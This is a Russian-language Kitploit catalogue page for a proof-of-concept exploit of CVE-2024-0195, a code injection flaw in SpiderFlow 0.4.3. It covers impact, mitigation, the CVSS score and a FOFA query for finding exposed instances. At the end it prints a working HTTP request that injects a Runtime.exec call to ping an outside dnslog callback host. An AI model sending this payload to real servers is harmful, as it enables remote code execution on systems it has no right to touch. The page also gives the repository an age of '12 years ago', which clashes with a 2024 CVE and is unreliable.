Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-0195-SpiderFlow — Эксплойт proof-of-concept для CVE-2024-0195, критической уязвимости внедрения кода в SpiderFlow 0.4.3, позволяющей удаленное выполнение кода через конечную точку FunctionService.saveFunction. | Kitploit
Инструменты/GitHubGitHub/hack-with-rohit/cve-2024-0195-spiderflow
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubhack-with-rohit/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

Эксплойт proof-of-concept для CVE-2024-0195, критической уязвимости внедрения кода в SpiderFlow 0.4.3, позволяющей удаленное выполнение кода через конечную точку FunctionService.saveFunction.

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-0195 Небезопасный контроль генерации кода ('Code Injection') Критический 2024

Краткое описание

CVE-2024-0195 — это критическая уязвимость внедрения кода в веб-приложении spider-flow версии 0.4.3, конкретно в функции FunctionService.saveFunction файла FunctionController.java. Злоумышленник может удалённо внедрить вредоносный код, который выполняется на сервере. Это позволяет полностью скомпрометировать приложение.

Воздействие..

Эта уязвимость чрезвычайно серьезна, так как позволяет удалённо выполнять код на сервере, где работает уязвимое приложение spider-flow. Злоумышленник может полностью скомпрометировать сервер, украсть конфиденциальные данные, установить вредоносное ПО или криптомайнеры и использовать его для дальнейших атак внутри сети. Конфиденциальность, целостность и доступность приложения и сервера критически нарушены.

Патч

Исправленная версия явно не указана, поэтому в настоящее время установка патча, похоже, недоступна. Уязвимость была публично раскрыта, и эксплойты доступны, поэтому немедленное смягчение последствий критически важно.

Смягчение

Пока официальный патч не выпущен, spider-flow 0.4.3 следует немедленно отключить или ограничить доступ только доверенным сетям/пользователям. Межсетевые экраны веб-приложений или другие средства контроля проверки входных данных можно настроить для обнаружения и блокировки попыток внедрения кода в качестве временной меры. Однако это не полные решения, и уязвимая версия должна быть обновлена, как только станет доступен исправленный релиз.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Эксплуатация

FOFA : app="spiderflow"

✔ Доказательство концепции

root@kitploit:~
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
Скачать инструмент